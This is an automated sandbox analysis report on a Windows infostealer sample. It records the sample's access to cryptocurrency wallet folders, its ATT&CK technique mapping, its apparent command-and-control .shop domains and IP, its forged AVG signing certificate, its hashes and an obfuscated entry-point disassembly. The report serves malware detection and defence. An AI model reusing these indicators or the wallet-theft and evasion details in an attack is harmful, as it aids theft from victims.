              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: Yara matchFile source: Process Memory Space: RrHuyQ4GzG.exe PID: 7508, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: RrHuyQ4GzG.exe PID: 7508, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              121
              Security Software Discovery
              Remote Services1
              Credential API Hooking
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              1
              Credential API Hooking
              11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              RrHuyQ4GzG.exe20%VirustotalBrowse
              RrHuyQ4GzG.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              incredibleextedwj.shop1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://sectigo.com/CPS00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              https://support.microsof0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              incredibleextedwj.shop1%VirustotalBrowse
              https://incredibleextedwj.shop/p9%VirustotalBrowse
              tolerateilusidjukl.shop1%VirustotalBrowse
              liabilitynighstjsko.shop1%VirustotalBrowse
              shortsvelventysjo.shop1%VirustotalBrowse
              shatterbreathepsw.shop1%VirustotalBrowse
              demonstationfukewko.shop1%VirustotalBrowse
              https://incredibleextedwj.shop/api11%VirustotalBrowse
              alcojoldwograpciw.shop1%VirustotalBrowse
              https://incredibleextedwj.shop/0%VirustotalBrowse
              productivelookewr.shop1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              incredibleextedwj.shop
              104.21.86.106
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              incredibleextedwj.shoptrueunknown
              shortsvelventysjo.shoptrueunknown
              tolerateilusidjukl.shoptrueunknown
              liabilitynighstjsko.shoptrueunknown
              shatterbreathepsw.shoptrueunknown
              demonstationfukewko.shoptrueunknown
              productivelookewr.shoptrueunknown
              https://incredibleextedwj.shop/apifalseunknown
              alcojoldwograpciw.shoptrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabRrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://sectigo.com/CPS0RrHuyQ4GzG.exefalse
                  • URL Reputation: safe
                  unknown
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://incredibleextedwj.shop/pRrHuyQ4GzG.exe, 00000000.00000003.1716421679.0000000000C91000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoRrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://ocsp.sectigo.com0RrHuyQ4GzG.exefalse
                      • URL Reputation: safe
                      unknown
                      https://incredibleextedwj.shop/apiuRrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.rootca1.amazontrust.com0:RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RrHuyQ4GzG.exe, 00000000.00000003.1716714886.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RrHuyQ4GzG.exe, 00000000.00000003.1716714886.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ecosia.org/newtab/RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brRrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ac.ecosia.org/autocomplete?q=RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://incredibleextedwj.shop/JRrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRrHuyQ4GzG.exefalse
                                            • URL Reputation: safe
                                            unknown
                                            https://incredibleextedwj.shop/MRrHuyQ4GzG.exe, 00000000.00000003.1716495040.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiRrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://x1.c.lencr.org/0RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://x1.i.lencr.org/0RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#RrHuyQ4GzG.exefalse
                                                • URL Reputation: safe
                                                unknown
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://incredibleextedwj.shop/RrHuyQ4GzG.exe, 00000000.00000003.1716421679.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1803906769.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    https://support.microsofRrHuyQ4GzG.exe, 00000000.00000003.1716714886.0000000003C9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/products/firefoxgro.allRrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://incredibleextedwj.shop/$RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.21.86.106
                                                              incredibleextedwj.shopUnited States
                                                              13335CLOUDFLARENETUStrue
                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1429055
                                                              Start date and time:2024-04-20 13:26:08 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 2m 54s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:2
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:RrHuyQ4GzG.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:6ac50f7457396de4520f8220f46c7756.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Stop behavior analysis, all processes terminated
                                                              • Exclude process from analysis (whitelisted): SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              TimeTypeDescription
                                                              13:27:03API Interceptor7x Sleep call for process: RrHuyQ4GzG.exe modified
                                                              No context
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUShttps://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94dGet hashmaliciousUnknownBrowse
                                                              • 172.67.74.40
                                                              jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                              • 104.21.4.208
                                                              74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                              • 104.21.76.57
                                                              SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                              • 172.67.215.45
                                                              Receipt_7814002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.13.205
                                                              Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                                              • 104.26.15.182
                                                              VN24A02765.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                              • 172.67.74.152
                                                              qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                              • 172.67.180.119
                                                              SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.106
                                                              SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.106
                                                              FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.106
                                                              z47Danfe-Pedido17042024.msiGet hashmaliciousMicroClipBrowse
                                                              • 104.21.86.106
                                                              SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              • 104.21.86.106
                                                              Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.106
                                                              s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                              • 104.21.86.106
                                                              SecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.86.106
                                                              avp.msiGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.106
                                                              13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.86.106
                                                              No context
                                                              No created / dropped files found
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.897751939317777
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:RrHuyQ4GzG.exe
                                                              File size:7'656'696 bytes
                                                              MD5:6ac50f7457396de4520f8220f46c7756
                                                              SHA1:4a1f490ceafdbefb97f52340d3a7b876eb7e3677
                                                              SHA256:d040b1cad2d958a927b1a5552e455a2de58c2379b65050a853f383df9836f5b5
                                                              SHA512:47e8bd5f596278006caa5ff9189706e02a966042001d5ac6e1a55db48417f2c47840714f8e0a10e7cdd58458460c66d4737cc58b7ce34d245dbeb5e244e50c53
                                                              SSDEEP:196608:aES43V86djD0D9o8pP5mVuVHDkFNiPxVJ+Gk:h2YcpokxmkZ46JVJe
                                                              TLSH:E876239A2D8B44D6E9C208B0A72BBBE3037319DFA9D84C352EC07049B471F76657AD53
                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...0.!f............................p.............@.................................e^u...@.................................\EU....
                                                              Icon Hash:29226ee6b692c62f
                                                              Entrypoint:0xe81d70
                                                              Entrypoint Section: 2
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66211930 [Thu Apr 18 12:59:28 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:9d119e2e17a860783c22ad990de068eb
                                                              Signature Valid:false
                                                              Signature Issuer:CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                              Error Number:-2146762487
                                                              Not Before, Not After
                                                              • 06/01/2024 10:14:42 07/01/2034 10:14:42
                                                              Subject Chain
                                                              • CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                              Version:3
                                                              Thumbprint MD5:27F5DD79C86B9255242DDB29A51B691E
                                                              Thumbprint SHA-1:44268FBAA5D87BA1717C7237701B06FA20E9AF66
                                                              Thumbprint SHA-256:1C39A7BBBC7445339DEFD55E21DFA65CDEB9037F0FD33140759077C31CB40BE0
                                                              Serial:59AE1233E1806897438DF0EEC7051E17
                                                              Instruction
                                                              call 00007FC914B23009h
                                                              not edx
                                                              ror edx, 03h
                                                              neg edx
                                                              push 79066E18h
                                                              push 0C3E1102h
                                                              xor edx, D7870B91h
                                                              mov ecx, 0A203096h
                                                              neg edx
                                                              or dword ptr [esp+ecx*4-2880C256h], ecx
                                                              pop ecx
                                                              xor ebx, edx
                                                              neg ecx
                                                              bts ecx, ecx
                                                              movsx eax, cx
                                                              add esi, edx
                                                              sar word ptr [esp+00h], 0003h
                                                              bswap eax
                                                              mov ax, word ptr [ebp+00h]
                                                              mov edx, B3024C26h
                                                              push edx
                                                              imul ecx, edx
                                                              mov dx, word ptr [ebp+02h]
                                                              push ecx
                                                              adc ebp, 00000001h
                                                              shr cx, 0064h
                                                              sbb byte ptr [esp+07h], 00000009h
                                                              not ax
                                                              rol ecx, cl
                                                              neg cx
                                                              xchg dword ptr [esp+08h], ecx
                                                              not dx
                                                              mov dword ptr [esp+0Ch], ecx
                                                              add dword ptr [esp+0Ah], ecx
                                                              or ax, dx
                                                              add cl, byte ptr [esp+0Bh]
                                                              mov word ptr [ebp+00h], ax
                                                              lea edx, dword ptr [ecx+ecx*8-414A3266h]
                                                              rol cl, FFFFFFC1h
                                                              call 00007FC9150F955Ah
                                                              and edx, dword ptr [esp+edx*2-262D6310h]
                                                              ror cx, 1
                                                              dec cx
                                                              lea eax, dword ptr [edx+edx*4-047C037Fh]
                                                              rol dx, FFA6h
                                                              sar dword ptr [esp+edx-1316622Ch], FFFFFFCCh
                                                              ror cx, 1
                                                              dec dx
                                                              mul edx
                                                              sal dl, 00000023h
                                                              xor bx, cx
                                                              mov dword ptr [esp+edx*2+006FA880h], eax
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x55455c0xa0 2
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe60000x6bbe.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x74bc000x18f8 2
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe50000x638.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x4a00000x4c 1
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x3aa810x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x3c0000x28fb0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x3f0000xa9800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              00x4a0000x455c7c0x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              10x4a00000x3dc0x400ac0451cae294259f9a0960093116e58dFalse0.0673828125data0.3732696603346658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              20x4a10000x7440000x744000bea8a1e034385366bbef82dfe3ca64b9unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .reloc0xbe50000x6380x800d63e3f65e2e94daa6d1bd875caa74ee1False0.4228515625GLS_BINARY_LSB_FIRST3.6147834027787398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .rsrc0xbe60000x6bbe0x6c00d1863c0fc436e1d4b8f0253c2a6f437eFalse0.5274522569444444data5.974715584215555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xbe62680x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.23902439024390243
                                                              RT_ICON0xbe68d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.38306451612903225
                                                              RT_ICON0xbe6bb80x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.597972972972973
                                                              RT_ICON0xbe6ce00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.6084754797441365
                                                              RT_ICON0xbe7b880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.8172382671480144
                                                              RT_ICON0xbe84300x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.7276011560693642
                                                              RT_ICON0xbe89980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4179460580912863
                                                              RT_ICON0xbeaf400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.6719043151969981
                                                              RT_ICON0xbebfe80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8315602836879432
                                                              RT_GROUP_ICON0xbec4500x84data0.6363636363636364
                                                              RT_MANIFEST0xbec4d40x6eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.41694915254237286
                                                              DLLImport
                                                              KERNEL32.dllExitProcess
                                                              OLEAUT32.dllSysAllocString
                                                              ole32.dllCoCreateInstance
                                                              USER32.dllCloseClipboard
                                                              GDI32.dllBitBlt
                                                              KERNEL32.dllGetSystemTimeAsFileTime
                                                              KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 20, 2024 13:27:02.991661072 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:02.991693020 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:02.991806984 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.002907991 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.002928019 CEST44349732104.21.86.106192.168.2.4
